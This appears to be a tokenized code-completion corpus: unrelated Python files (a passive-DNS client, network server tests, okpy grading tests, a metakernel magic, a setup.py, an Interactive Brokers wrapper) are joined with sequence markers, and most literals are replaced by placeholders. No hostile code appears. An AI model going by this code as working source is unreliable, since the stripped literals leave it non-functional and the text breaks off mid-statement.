keep = True <EOL> if keep : <EOL> new_lines . append ( string . join ( data , "<STR_LIT:\t>" ) ) <EOL> elif options . apply : <EOL> for key in keys : <EOL> for k in keys [ key ] : <EOL> line = line . replace ( key , k ) <EOL> new_lines . append ( line [ : - <NUM_LIT:1> ] ) <EOL> if new_lines : <EOL> outfile . write ( string . join ( new_lines , "<STR_LIT:\n>" ) + "<STR_LIT:\n>" ) <EOL> if options . create : <EOL> create_file = IOTools . openFile ( options . create , "<STR_LIT:w>" ) <EOL> for key in keys : <EOL> for k in keys [ key ] : <EOL> create_file . write ( "<STR_LIT>" % ( key , str ( k ) ) ) <EOL> create_file . close ( ) <EOL> if close_outfile : <EOL> outfile . close ( ) <EOL> if close_infile : <EOL> infile . close ( ) <EOL> if options . inplace and not options . backup : <EOL> os . remove ( file + "<STR_LIT>" ) <EOL> E . Stop ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> import datetime <EOL> import json <EOL> import requests <EOL> try : <EOL> import requests_cache <EOL> HAS_CACHE = True <EOL> except ImportError : <EOL> HAS_CACHE = False <EOL> import logging <EOL> logger = logging <EOL> sort_choice = [ '<STR_LIT:count>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class PyPDNS ( object ) : <EOL> def __init__ ( self , url = '<STR_LIT>' , basic_auth = None , <EOL> auth_token = None , enable_cache = False , cache_expire_after = <NUM_LIT> , cache_file = '<STR_LIT>' ) : <EOL> self . url = url <EOL> if enable_cache and not HAS_CACHE : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . enable_cache = enable_cache <EOL> if enable_cache is True : <EOL> requests_cache . install_cache ( cache_file , backend = '<STR_LIT>' , expire_after = cache_expire_after ) <EOL> self . session = requests_cache . CachedSession ( ) <EOL> else : <EOL> self . session = requests . Session ( ) <EOL> if basic_auth is not None : <EOL> self . session . auth = basic_auth <EOL> elif auth_token is not None : <EOL> self . session . headers . update ( { '<STR_LIT>' : auth_token } ) <EOL> else : <EOL> pass <EOL> def query ( self , q , sort_by = '<STR_LIT>' ) : <EOL> logger . info ( "<STR_LIT>" , q ) <EOL> if sort_by not in sort_choice : <EOL> raise Exception ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( sort_choice ) ) <EOL> response = self . session . get ( '<STR_LIT>' . format ( self . url , q ) ) <EOL> if response . status_code != <NUM_LIT:200> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> to_return = [ ] <EOL> for l in response . text . split ( '<STR_LIT:\n>' ) : <EOL> if len ( l ) == <NUM_LIT:0> : <EOL> continue <EOL> try : <EOL> if self . enable_cache is True and response . from_cache is True : <EOL> logger . info ( "<STR_LIT>" , q ) <EOL> obj = json . loads ( l ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" , q ) <EOL> raise Exception ( '<STR_LIT>' + l ) <EOL> obj [ '<STR_LIT>' ] = datetime . datetime . fromtimestamp ( obj [ '<STR_LIT>' ] ) <EOL> obj [ '<STR_LIT>' ] = datetime . datetime . fromtimestamp ( obj [ '<STR_LIT>' ] ) <EOL> to_return . append ( obj ) <EOL> to_return = sorted ( to_return , key = lambda k : k [ sort_by ] ) <EOL> return to_return </s>
<s> import socket <EOL> from gevent import monkey <EOL> from cachebrowser . network import ConnectionHandler , HttpServer , HttpConnectionHandler <EOL> import unittest <EOL> from mock import Mock , patch <EOL> monkey . patch_all ( ) <EOL> class ServerTest ( unittest . TestCase ) : <EOL> def test_server ( self ) : <EOL> pass <EOL> def test_connection_handler ( self ) : <EOL> sock = Mock ( spec = socket . socket ) <EOL> sock . recv = Mock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> handler = ConnectionHandler ( ) <EOL> handler . on_connect = Mock ( ) <EOL> handler . on_data = Mock ( ) <EOL> handler . on_close = Mock ( ) <EOL> handler . on_error = Mock ( ) <EOL> handler . loop ( sock , '<STR_LIT>' ) <EOL> handler . on_connect . assert_called_once_with ( ) <EOL> handler . on_data . assert_called_once_with ( '<STR_LIT>' ) <EOL> handler . on_close . assert_called_once_with ( ) <EOL> handler . on_error . assert_not_called ( ) <EOL> sock . recv = Mock ( side_effect = socket . error ) <EOL> handler = ConnectionHandler ( ) <EOL> handler . on_error = Mock ( ) <EOL> handler . loop ( sock , '<STR_LIT>' ) <EOL> assert handler . on_error . called <EOL> class HttpServerTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> PORT = <NUM_LIT> <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . handler = HttpConnectionHandler ( ) <EOL> cls . server = HttpServer ( cls . PORT , handler = cls . handler ) <EOL> cls . server . start ( ) <EOL> def make_get ( self , path , query = None ) : <EOL> import urllib2 <EOL> request = '<STR_LIT>' % ( self . PORT , path ) <EOL> if query : <EOL> request = request + '<STR_LIT:?>' + query <EOL> urllib2 . urlopen ( request ) <EOL> def make_post ( self , path , data = None ) : <EOL> import urllib , urllib2 <EOL> if not data : <EOL> data = { } <EOL> encoded_data = urllib . urlencode ( data ) <EOL> request = '<STR_LIT>' % ( self . PORT , path ) <EOL> urllib2 . urlopen ( request , data = encoded_data ) <EOL> def test_get_no_param ( self ) : <EOL> path = '<STR_LIT>' <EOL> def on_request ( env , start ) : <EOL> self . assertEqual ( path . strip ( '<STR_LIT:/>' ) , env [ '<STR_LIT>' ] . strip ( '<STR_LIT:/>' ) ) <EOL> self . assertEqual ( '<STR_LIT:GET>' , env [ '<STR_LIT>' ] ) <EOL> start ( '<STR_LIT>' , [ ] ) <EOL> yield '<STR_LIT>' <EOL> self . handler . on_request = on_request <EOL> self . make_get ( path ) <EOL> def test_get_with_param ( self ) : <EOL> path = '<STR_LIT>' <EOL> query = '<STR_LIT>' <EOL> def on_request ( env , start ) : <EOL> self . assertEqual ( query , env [ '<STR_LIT>' ] ) <EOL> start ( '<STR_LIT>' , [ ] ) <EOL> yield '<STR_LIT>' <EOL> self . handler . on_request = on_request <EOL> self . make_get ( path , query ) </s>
<s> import importlib <EOL> import os <EOL> def load_module ( filepath ) : <EOL> module_name = path_to_module_string ( filepath ) <EOL> return importlib . import_module ( module_name ) <EOL> def path_to_module_string ( filepath ) : <EOL> filepath = filepath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> module_components = [ ] <EOL> while filepath : <EOL> filepath , component = os . path . split ( filepath ) <EOL> module_components . insert ( <NUM_LIT:0> , component ) <EOL> return '<STR_LIT:.>' . join ( module_components ) </s>
<s> test = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:code>' : r"""<STR_LIT>""" , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> ] <EOL> } </s>
<s> from client . protocols import unlock <EOL> from client . utils import guidance <EOL> from client . sources . common import models <EOL> from client . utils import assess_id_util <EOL> import mock <EOL> import unittest <EOL> import os <EOL> class GuidanceProtocolTest ( unittest . TestCase ) : <EOL> GUIDANCE_DIRECTORY = "<STR_LIT>" <EOL> MISUCOUNT_FILE = "<STR_LIT>" <EOL> TEST = "<STR_LIT>" <EOL> CASE_ID = TEST + '<STR_LIT>' <EOL> UNIQUE_ID = "<STR_LIT>" <EOL> PROMPT = "<STR_LIT>" <EOL> ANSWER = [ "<STR_LIT>" ] <EOL> ANSWERMSG = [ "<STR_LIT>" ] <EOL> INPUT0 = [ [ '<STR_LIT:1>' , '<STR_LIT:3>' ] , [ '<STR_LIT:0>' , '<STR_LIT:4>' ] , [ '<STR_LIT:1>' , '<STR_LIT>' ] ] <EOL> TG0MSG = [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> INPUT1 = [ [ '<STR_LIT:1>' , '<STR_LIT:3>' ] , [ '<STR_LIT:1>' , '<STR_LIT:1>' ] , [ '<STR_LIT:1>' , '<STR_LIT:4>' ] , [ '<STR_LIT:1>' , '<STR_LIT:5>' ] ] <EOL> TG1MSG = [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> INPUT2 = [ [ '<STR_LIT:1>' , '<STR_LIT:3>' ] , [ '<STR_LIT:0>' , '<STR_LIT:4>' ] , [ '<STR_LIT:1>' , '<STR_LIT:0>' , '<STR_LIT:100>' ] , [ '<STR_LIT:4>' , '<STR_LIT>' , '<STR_LIT:0>' ] ] <EOL> TG2MSG = [ [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> ALLINPUTS = [ INPUT0 , INPUT1 , INPUT2 ] <EOL> ALLMSG = [ TG0MSG , TG1MSG , TG2MSG ] <EOL> def setUp ( self ) : <EOL> self . cmd_args = mock . Mock ( ) <EOL> self . assignment = mock . Mock ( ) <EOL> self . proto = unlock . protocol ( self . cmd_args , self . assignment ) <EOL> self . proto . guidance_util = guidance . Guidance ( self . GUIDANCE_DIRECTORY ) <EOL> self . proto . guidance_util . set_tg = self . mockSet_TG <EOL> self . proto . current_test = self . TEST <EOL> self . proto . _verify = self . mockVerify <EOL> self . proto . _input = self . mockInput <EOL> self . input_choices = [ ] <EOL> self . choice_number = <NUM_LIT:0> <EOL> def mockSet_TG ( self , access_token , guidance_flag ) : <EOL> return <NUM_LIT:1> <EOL> def mockInput ( self , prompt ) : <EOL> self . choice_number += <NUM_LIT:1> <EOL> return self . input_choices [ self . choice_number - <NUM_LIT:1> ] <EOL> def mockVerify ( self , guess , locked ) : <EOL> return guess == locked <EOL> def checkNumberOfAttempts ( self , number_of_attempts ) : <EOL> self . assertEqual ( number_of_attempts , len ( self . proto . analytics ) ) <EOL> def checkDictField ( self , dictionary , field , expected_value ) : <EOL> self . assertIn ( field , dictionary ) <EOL> self . assertEqual ( expected_value , dictionary [ field ] ) <EOL> def callsInteractError ( self , expected_error , answer , choices = None , unique_id = None , <EOL> case_id = None , prompt = None , randomize = True ) : <EOL> if not unique_id : <EOL> unique_id = self . UNIQUE_ID <EOL> if not case_id : <EOL> case_id = self . CASE_ID <EOL> if not prompt : <EOL> prompt = self . PROMPT <EOL> if not choices : <EOL> choices = None <EOL> self . assertRaises ( expected_error , self . proto . interact , <EOL> unique_id , case_id , prompt , answer ) <EOL> def callsInteract ( self , expected , answer , choices = None , unique_id = None , <EOL> case_id = None , prompt = None , randomize = True ) : <EOL> if not unique_id : <EOL> unique_id = self . UNIQUE_ID <EOL> if not case_id : <EOL> case_id = self . CASE_ID <EOL> if not prompt : <EOL> prompt = self . PROMPT <EOL> if not choices : <EOL> choices = None <EOL> self . assertEqual ( expected , self . proto . interact ( unique_id , case_id , <EOL> prompt , answer , choices = choices , randomize = randomize ) ) <EOL> def validateRecord ( self , record , answer , correct , prompt = None , <EOL> unique_id = None , case_id = None , guidance_msg = None ) : <EOL> if not unique_id : <EOL> unique_id = self . UNIQUE_ID <EOL> if not case_id : <EOL> case_id = self . CASE_ID <EOL> if not prompt : <EOL> prompt = self . PROMPT <EOL> self . checkDictField ( record , '<STR_LIT>' , prompt ) <EOL> self . checkDictField ( record , '<STR_LIT>' , answer ) <EOL> self . checkDictField ( record , '<STR_LIT>' , correct ) <EOL> self . checkDictField ( record , '<STR_LIT:id>' , unique_id ) <EOL> self . checkDictField ( record , '<STR_LIT>' , case_id ) <EOL> self . checkDictField ( record , '<STR_LIT>' , guidance_msg ) <EOL> self . assertIn ( '<STR_LIT>' , record ) <EOL> self . assertIsInstance ( record [ '<STR_LIT>' ] , int ) <EOL> self . assertIn ( '<STR_LIT>' , record ) <EOL> self . assertIsInstance ( record [ '<STR_LIT>' ] , int ) <EOL> def testSingleLine_immediatelyCorrect ( self ) : <EOL> self . input_choices = self . ANSWER <EOL> self . callsInteract ( self . ANSWER , self . ANSWER ) <EOL> self . checkNumberOfAttempts ( <NUM_LIT:1> ) <EOL> attempt = self . proto . analytics [ <NUM_LIT:0> ] <EOL> self . validateRecord ( attempt , answer = self . ANSWER , correct = True , guidance_msg = self . ANSWERMSG [ <NUM_LIT:0> ] ) <EOL> def testAllTreatmentGroups ( self ) : <EOL> for tg in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> cur_input = self . ALLINPUTS [ tg ] <EOL> cur_expect_msg = self . ALLMSG [ tg ] <EOL> for x in range ( <NUM_LIT:0> , len ( cur_input ) ) : <EOL> self . setUp ( ) <EOL> self . proto . guidance_util . tg_id = tg <EOL> try : <EOL> os . remove ( self . GUIDANCE_DIRECTORY + self . MISUCOUNT_FILE ) <EOL> except : <EOL> pass <EOL> self . input_choices = cur_input [ x ] + self . ANSWER <EOL> self . callsInteract ( self . ANSWER , self . ANSWER ) <EOL> self . checkNumberOfAttempts ( len ( self . input_choices ) ) <EOL> attempt = self . proto . analytics [ <NUM_LIT:0> ] <EOL> for attempt_number , attempt in enumerate ( self . proto . analytics ) : <EOL> if attempt_number < len ( cur_input [ x ] ) : <EOL> self . validateRecord ( attempt , <EOL> answer = [ cur_input [ x ] [ attempt_number ] ] , <EOL> correct = False , guidance_msg = cur_expect_msg [ x ] [ attempt_number ] ) <EOL> else : <EOL> self . validateRecord ( attempt , <EOL> answer = self . ANSWER , <EOL> correct = True , guidance_msg = self . ANSWERMSG [ <NUM_LIT:0> ] ) </s>
<s> from metakernel import Magic <EOL> from IPython . display import Javascript <EOL> class JavascriptMagic ( Magic ) : <EOL> def line_javascript ( self , code ) : <EOL> """<STR_LIT>""" <EOL> jscode = Javascript ( code ) <EOL> self . kernel . Display ( jscode ) <EOL> def cell_javascript ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . code . strip ( ) : <EOL> jscode = Javascript ( self . code ) <EOL> self . kernel . Display ( jscode ) <EOL> self . evaluate = False <EOL> def register_magics ( kernel ) : <EOL> kernel . register_magics ( JavascriptMagic ) </s>
<s> from metakernel . tests . utils import ( get_kernel , get_log_text , <EOL> clear_log_text , EvalKernel ) <EOL> import re <EOL> import os <EOL> from metakernel . config import get_local_magics_dir <EOL> filename = get_local_magics_dir ( ) + os . sep + "<STR_LIT>" <EOL> def test_install_magic_magic ( ) : <EOL> kernel = get_kernel ( EvalKernel ) <EOL> kernel . do_execute ( "<STR_LIT>" ) <EOL> text = get_log_text ( kernel ) <EOL> assert re . match ( "<STR_LIT>" , text , re . DOTALL | re . M ) , "<STR_LIT>" <EOL> assert os . path . isfile ( filename ) , ( "<STR_LIT>" % filename ) <EOL> def teardown ( ) : <EOL> os . remove ( filename ) </s>
<s> print ( list ( range ( <NUM_LIT:100> ) ) ) </s>
<s> from . estimation import KaplanMeierFitter , NelsonAalenFitter , AalenAdditiveFitter , BreslowFlemingHarringtonFitter , CoxPHFitter , WeibullFitter , ExponentialFitter <EOL> import lifelines . datasets <EOL> from . version import __version__ <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] </s>
<s> import os <EOL> from distutils . core import setup <EOL> def read ( fname ) : <EOL> return open ( os . path . join ( os . path . dirname ( __file__ ) , fname ) ) . read ( ) <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> license = "<STR_LIT>" , <EOL> keywords = '<STR_LIT>' , <EOL> package_data = { <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> } , <EOL> ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import logging as logger <EOL> import types <EOL> from ib . ext . EWrapper import EWrapper <EOL> from ib . client . Portfolio import Account , AccountMessage , PortfolioMessage <EOL> from ib . client . Queries import Contracts , Executions <EOL> def showmessage ( message , mapping ) : <EOL> try : <EOL> del ( mapping [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ) : <EOL> pass <EOL> items = mapping . items ( ) <EOL> items . sort ( ) <EOL> print '<STR_LIT>' % ( message , ) <EOL> for k , v in items : <EOL> print '<STR_LIT>' % ( k , v ) <EOL> class Observable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . listeners = { } <EOL> self . logger = logger . getLogger ( ) <EOL> def register ( self , listener , events = None ) : <EOL> """<STR_LIT>""" <EOL> if events is not None and type ( events ) not in ( types . TupleType , types . ListType ) : <EOL> events = ( events , ) <EOL> self . listeners [ listener ] = events <EOL> def dispatch ( self , event = None , msg = None ) : <EOL> """<STR_LIT>""" <EOL> for listener , events in self . listeners . items ( ) : <EOL> if events is None or event is None or event in events : <EOL> try : <EOL> listener ( self , event , msg ) <EOL> except ( Exception , ) : <EOL> self . unregister ( listener ) <EOL> errmsg = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" . format ( listener . func_name , event ) <EOL> self . logger . exception ( errmsg ) <EOL> def unregister ( self , listener ) : <EOL> """<STR_LIT>""" <EOL> del self . listeners [ listener ] <EOL> class SyncWrapper ( EWrapper , Observable ) : <EOL> suppress = False <EOL> emitter = [ ] <EOL> account = Account ( ) <EOL> contracts = Contracts ( ) <EOL> executions = Executions ( ) <EOL> order_messages = [ ] <EOL> ref_id = None <EOL> order_id = <NUM_LIT> <EOL> def __init__ ( self , subs = { } ) : <EOL> super ( SyncWrapper , self ) . __init__ ( ) <EOL> self . subscriptions = subs <EOL> def accountDownloadEnd ( self , accountName ) : <EOL> msg = { '<STR_LIT>' : accountName } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def bondContractDetails ( self , reqId , contractDetails ) : <EOL> self . contracts . append ( reqId , contractDetails ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def commissionReport ( self , commissionReport ) : <EOL> msg = { '<STR_LIT>' : commissionReport } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def connectionClosed ( self ) : <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def contractDetails ( self , reqId , contractDetails ) : <EOL> self . contracts . append ( reqId , contractDetails ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def contractDetailsEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def currentTime ( self , time ) : <EOL> msg = { '<STR_LIT:time>' : time } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def deltaNeutralValidation ( self , reqId , underComp ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : underComp } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def error_0 ( self , strval ) : <EOL> msg = { '<STR_LIT>' : strval } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def error_1 ( self , id , errorCode , errorMsg ) : <EOL> msg = { '<STR_LIT:id>' : id , <EOL> '<STR_LIT>' : errorCode , <EOL> '<STR_LIT>' : errorMsg } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def execDetails ( self , reqId , contract , execution ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : contract , <EOL> '<STR_LIT>' : execution } <EOL> self . executions . append ( reqId , execution ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , msg ) <EOL> def execDetailsEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def fundamentalData ( self , reqId , data ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT:data>' : data } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def historicalData ( self , reqId , date , open , high , low , close , volume , count , WAP , hasGaps ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT:date>' : date , <EOL> '<STR_LIT>' : open , <EOL> '<STR_LIT>' : high , <EOL> '<STR_LIT>' : low , <EOL> '<STR_LIT>' : close , <EOL> '<STR_LIT>' : volume , <EOL> '<STR_LIT:count>' : count , <EOL> '<STR_LIT>' : WAP , <EOL> '<STR_LIT>' : hasGaps } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def managedAccounts ( self , accountsList ) : <EOL> msg = filter ( None , accountsList . split ( '<STR_LIT:U+002C>' ) ) <EOL> self . account . child_accounts = msg <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def marketDataType ( self , reqId , marketDataType ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : marketDataType } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def nextValidId ( self , orderId ) : <EOL> msg = { '<STR_LIT>' : orderId } <EOL> self . order_id = orderId <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def openOrder ( self , orderId , contract , order , orderState ) : <EOL> msg = { '<STR_LIT>' : orderId , <EOL> '<STR_LIT>' : contract , <EOL> '<STR_LIT>' : order , <EOL> '<STR_LIT>' : orderState } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def openOrderEnd ( self ) : <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def orderStatus ( self , orderId , status , filled , remaining , avgFillPrice , permId , parentId , lastFillPrice , clientId , <EOL> whyHeld ) : <EOL> msg = { '<STR_LIT>' : orderId , <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : filled , <EOL> '<STR_LIT>' : remaining , <EOL> '<STR_LIT>' : avgFillPrice , <EOL> '<STR_LIT>' : permId , <EOL> '<STR_LIT>' : parentId , <EOL> '<STR_LIT>' : lastFillPrice , <EOL> '<STR_LIT>' : clientId , <EOL> '<STR_LIT>' : whyHeld } <EOL> self . order_messages . append ( msg ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def realtimeBar ( self , reqId , time , open , high , low , close , volume , wap , count ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT:time>' : time , <EOL> '<STR_LIT>' : open , <EOL> '<STR_LIT>' : high , <EOL> '<STR_LIT>' : low , <EOL> '<STR_LIT>' : close , <EOL> '<STR_LIT>' : volume , <EOL> '<STR_LIT>' : wap , <EOL> '<STR_LIT:count>' : count } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def receiveFA ( self , faDataType , xml ) : <EOL> msg = { '<STR_LIT>' : faDataType , <EOL> '<STR_LIT>' : xml } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def scannerData ( self , reqId , rank , contractDetails , distance , benchmark , projection , legsStr ) : <EOL> msg = { '<STR_LIT>' : reqId , <EOL> '<STR_LIT>' : rank , <EOL> '<STR_LIT>' : contractDetails , <EOL> '<STR_LIT>' : distance , <EOL> '<STR_LIT>' : benchmark , <EOL> '<STR_LIT>' : projection , <EOL> '<STR_LIT>' : legsStr } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def scannerDataEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def scannerParameters ( self , xml ) : <EOL> msg = { '<STR_LIT>' : xml } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickEFP ( self , tickerId , tickType , basisPoints , formattedBasisPoints , impliedFuture , holdDays , futureExpiry , <EOL> dividendImpact , dividendsToExpiry ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : tickType , <EOL> '<STR_LIT>' : basisPoints , <EOL> '<STR_LIT>' : formattedBasisPoints , <EOL> '<STR_LIT>' : impliedFuture , <EOL> '<STR_LIT>' : holdDays , <EOL> '<STR_LIT>' : futureExpiry , <EOL> '<STR_LIT>' : dividendImpact , <EOL> '<STR_LIT>' : dividendsToExpiry } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickGeneric ( self , tickerId , tickType , value ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : tickType , <EOL> '<STR_LIT:value>' : value } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickOptionComputation ( self , tickerId , field , impliedVol , delta , optPrice , pvDividend , gamma , vega , theta , <EOL> undPrice ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : field , <EOL> '<STR_LIT>' : impliedVol , <EOL> '<STR_LIT>' : delta , <EOL> '<STR_LIT>' : optPrice , <EOL> '<STR_LIT>' : pvDividend , <EOL> '<STR_LIT>' : gamma , <EOL> '<STR_LIT>' : vega , <EOL> '<STR_LIT>' : theta , <EOL> '<STR_LIT>' : undPrice } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickPrice ( self , tickerId , field , price , canAutoExecute ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : field , <EOL> '<STR_LIT>' : price , <EOL> '<STR_LIT>' : canAutoExecute } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickSize ( self , tickerId , field , size ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : field , <EOL> '<STR_LIT:size>' : size } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickSnapshotEnd ( self , reqId ) : <EOL> msg = { '<STR_LIT>' : reqId } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def tickString ( self , tickerId , tickType , value ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : tickType , <EOL> '<STR_LIT:value>' : value } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateAccountTime ( self , timeStamp ) : <EOL> msg = { '<STR_LIT>' : timeStamp } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateAccountValue ( self , key , value , currency , accountName ) : <EOL> msg = AccountMessage ( key , value , currency ) <EOL> if '<STR_LIT>' in self . account [ self . ref_id ] [ '<STR_LIT>' ] . messages : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . messages = [ msg ] <EOL> else : <EOL> self . account [ self . ref_id ] [ '<STR_LIT>' ] . add_message ( msg ) <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateMktDepth ( self , tickerId , position , operation , side , price , size ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : position , <EOL> '<STR_LIT>' : operation , <EOL> '<STR_LIT>' : side , <EOL> '<STR_LIT>' : price , <EOL> '<STR_LIT:size>' : size } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateMktDepthL2 ( self , tickerId , position , marketMaker , operation , side , price , size ) : <EOL> msg = { '<STR_LIT>' : tickerId , <EOL> '<STR_LIT>' : position , <EOL> '<STR_LIT>' : marketMaker , <EOL> '<STR_LIT>' : operation , <EOL> '<STR_LIT>' : side , <EOL> '<STR_LIT>' : price , <EOL> '<STR_LIT:size>' : size } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updateNewsBulletin ( self , msgId , msgType , message , origExchange ) : <EOL> msg = { '<STR_LIT>' : msgId , <EOL> '<STR_LIT>' : msgType , <EOL> '<STR_LIT:message>' : message , <EOL> '<STR_LIT>' : origExchange } <EOL> if self . suppress is False : <EOL> showmessage ( '<STR_LIT>' , vars ( ) ) <EOL> def updatePortfolio ( self , contract , position , marketPrice , marketValue , averageCost , unrealizedPNL , realizedPNL , <EOL> accountName ) : <EOL> msg = 